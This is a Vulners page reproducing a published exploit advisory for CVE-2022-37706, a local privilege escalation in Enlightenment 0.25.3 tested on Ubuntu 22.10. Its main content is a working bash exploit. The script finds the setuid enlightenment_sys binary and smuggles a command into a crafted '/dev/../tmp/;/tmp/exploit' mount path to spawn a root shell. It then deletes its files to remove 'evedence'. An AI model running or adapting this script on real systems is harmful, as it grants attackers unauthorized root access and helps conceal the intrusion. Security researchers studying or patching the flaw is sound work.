Vulners
Lucene search
Enlightenment 0.25.3 Privilege Escalation
10
`## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.4 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Dec 2022 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.05486